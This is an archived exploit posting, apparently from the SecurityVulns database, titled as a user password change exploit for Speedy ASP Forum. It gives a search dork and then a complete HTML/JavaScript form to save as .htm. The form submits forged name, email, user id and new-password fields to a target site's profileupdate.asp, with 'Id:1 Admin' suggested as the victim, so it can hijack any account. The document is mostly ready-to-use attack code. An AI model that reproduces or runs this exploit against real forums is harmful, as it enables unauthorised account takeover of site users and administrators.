SecurityvulnsSECURITYVULNS:DOC:12866Speedy ASP Forum(profileupdate.asp) User Pass Change Exploit
Title : Speedy ASP Forum(profileupdate.asp) User Pass Change Exploit
Dork : Copyright © ASPwebSoft
Author : ajann
greetz : Nukedx
###Code:
Save to .htm
<title>Pass Change</title>
<script language="JavaScript">
//Coded ajann
function islemKontrol(){
if(document.InputForm.name.value=="" || document.InputForm.email.value=="" ||
document.InputForm.id.value=="" || document.InputForm.password.value=="" ||
document.InputForm.passwordre.value=="" || document.InputForm.country.options.value == 0 ||
document.InputForm.adres.value=="" ){
alert("Alani Bos Biraktiniz")
return false
}
{
document.InputForm.action= document.InputForm.adres.value
document.InputForm.submit();
return true
}
}
</script>
<body bgcolor="#000000">
<form name = "InputForm" method = "post" onSubmit = 'return islemKontrol()'>
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User Name
: </b></font>
<input type="text" name="name" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Mail
: </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
[email protected]</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
İd
: </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: İd:1 Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country : </b>
</font>
<select size="1" name="country">
<option value=0>Choose Country</option>
<option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example: Turkey</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">
: </font></b>
<input type = "text" name="password" value="Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2"
color="#FF0000">
: </font></b>
<input type = "text" name="passwordre" value="Re Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>Form Action : </b>
</font>
<input type="text" name="adres" value="profileupdate.asp" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
http://[target]/[path]/profileupdate.asp</font></p>
<p>
<input type = "submit" name="Submit" value="Change"> </p>
<br>
</form>
And Code